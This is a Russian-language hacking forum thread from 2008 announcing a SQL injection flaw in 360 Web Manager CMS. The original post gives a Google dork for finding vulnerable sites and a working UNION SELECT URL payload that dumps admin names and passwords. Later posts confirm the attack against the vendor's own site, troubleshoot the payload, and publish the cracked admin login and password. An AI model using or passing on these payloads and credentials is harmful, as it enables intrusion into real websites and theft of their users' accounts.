Форум АНТИЧАТ - 360 Web Manager CMS Remote SQL Injection Vulnerability

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - 360 Web Manager CMS Remote SQL Injection Vulnerability (https://forum.antichat.xyz/showthread.php?t=59289)

Ded MustD!e

20.01.2008 08:48

360 Web Manager CMS Remote SQL Injection Vulnerability

360 Web Manager CMS Remote SQL Injection Vulnerability

Author: Ded MustD!e
Site: http://www.360webmanager.com/
Google Dork: inurl:"IDFM=" "form.php"
Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+u ser/*
Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+u ser/* :D =)))
Details: количество колонок может варьироваться, логин админа всегда "superadmin", админка - http://www.site.com/adm/login.php

Добавил на milw0rm: http://www.milw0rm.com/exploits/4944

Nightmarе

20.01.2008 09:50

Замечательно!

Nightmarе

20.01.2008 09:55

Хотя у меня что на официальном сайте пишет: Table 'webmanag_data.u' doesn't exist
Что на другом Table 'блаблабла' doesn't exist
Но то что официальный сайт поимели это вобще лол!!!!!!!!!!!

Ded MustD!e

20.01.2008 13:14

Цитата:

Сообщение от Nightmarе

когда копируешь, пробелы бывает получаются, ты просто пробел из ссылки не убрал, у тебя +from+u%20ser получается, тогда он так и пишет=)))

Ded MustD!e

20.01.2008 18:43

В теме "Расшифровка хэшей" расшифровали хэш к сайту. Теперь можно войти в админку официалки=)))))

http://www.360webmanager.com/adm/

login: superadmin
pass: 1320webx

Время: 04:13